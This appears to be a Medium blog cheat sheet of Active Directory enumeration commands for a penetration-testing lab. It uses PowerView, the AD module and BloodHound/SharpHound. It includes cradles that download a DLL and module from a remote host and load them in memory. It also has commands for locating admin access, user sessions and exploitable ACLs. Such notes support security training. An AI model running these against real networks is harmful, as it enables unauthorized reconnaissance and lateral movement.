AD Enumeration

C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\<Version>
Import-Module ([System.Reflection.Assembly]::Load((Invoke-WebRequest -Uri "http://192.0.0.3/Microsoft.ActiveDirectory.Management.dll").content))
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ActiveDirectory
New-Module -Name "Your Module Name" -ScriptBlock ([Scriptblock]::Create((New-Object System.Net.WebClient).DownloadString("http://192.0.0.3/ActiveDirectory.psd1")))
. <PATH>/Powerview.ps1

Domain Enumeration:

A) Using Domain Class-

$ADclass=[System.Directoryservices.activeDirectory.Domain]
$ADclass::GetCurrentDomain()

B) Powerview-

Powerview implements same thing but allows various options like shown below.

Get-Domain
Get-Domain -Domain eurocorp.local
(Get-DomainPolicyData).SystemAccess
(Get-DomainPolicyData -Domain eurocorp.local).SystemAccess
(Get-DomainPolicyData).KerberosPolicy
Get-DomainController
(Get-DomainController).Partitions
Get-DomainUser
Get-DomainUser | Select-Object samaccountname
Get-DomainUser -Identity student479
Get-DomainUser -Identity student1 -Properties *
Get-DomainUser -Properties samaccountname,logonCount | Select-Object -First 2
Get-DomainUser -LDAPFilter "Description=*built*" | Select-Object name,Description
Get-DomainComputer | Select-Object -First 2
Get-DomainComputer –OperatingSystem "*Server 2016*"
Get-DomainGroup | Select-Object -First 2
Get-DomainGroup | Select-Object Name
Get-DomainGroup *admin* | Select-Object name
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroup –UserName "student479"
Get-DomainGroup -UserName "student479" | Select-Object name
Get-DomainGroup *admin* -Domain moneycorp.local | Select-Object samaccountname
Invoke-Sharefinder -Verbose
Invoke-FileFinder –Verbose
Get-DomainGPO | Select-Object -First 1
Get-DomainGPOLocalGroup
Get-DomainOU
Get-DomainGPO -Identity "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"
Get-DomainOU | Where-Object name -eq "StudentMachines" | Select-Object distinguishedname
Get-DomainOU | Where-Object name -eq "StudentMachines" | Select-Object distinguishedname | ForEach-Object {Get-DomainComputer -SearchBase $_.distinguishedname} | Select-Object nameORGet-DomainComputer -SearchBase $((Get-DomainOU -Identity "StudentMachines").distinguishedname)OR$obj=(Get-DomainOU -Identity "StudentMachines").distinguishedname ; Get-DomainComputer -SearchBase $obj
Get-DomainObjectAcl -SamAccountName student479 -ResolveGUIDs
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
Find-InterestingDomainAcl -ResolveGUIDs
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"
Get-DomainTrust
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local
Get-Forest
Get-Forest -Forest eurocorp.local
Get-ForestDomain
Get-ForestDomain –Forest eurocorp.local
Find-LocalAdminAccess -Verbose
Find-PSRemotingLocalAdminAccess
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -CheckAccess
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"
Get-ADDomain
Get-ADDomain -Identity moneycorp.local
Get-ADDomainController
Get-ADDomainController -DomainName moneycorp.local -Discover
Get-ADUser -Filter * -Properties * | Select-Object -First 2
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
Get-ADComputer -Filter * | Select-Object -first 1
Get-ADComputer -Filter * -Properties * | Select-Object -first 1
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | Select-Object Name,OperatingSystem
Get-ADComputer -Filter * | Select-Object DNSHostName | ForEach-Object {Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADGroup -Filter * | Select-Object Name
Get-ADGroup -Filter * -Properties * | Select-Object -first 1
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity student479
Get-ADOrganizationalUnit -Filter * -Properties *
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access
Get-ADTrust -Filter *
Get-ADTrust –Identity us.dollarcorp.moneycorp.local
Get-ADForest
Get-ADForest -Identity eurocorp.local
(Get-ADForest).Domains
Get-ADForest | Select-Object -ExpandProperty GlobalCatalogs

D) Bloodhound-

i) Download and extract the tool from here- https://github.com/BloodHoundAD/BloodHound/releases

apt install bloodhound -y
apt install neo4j -y
neo4j start
./BloodHound --no-sandbox
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose
OR.\SharpHound.exe -c all

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/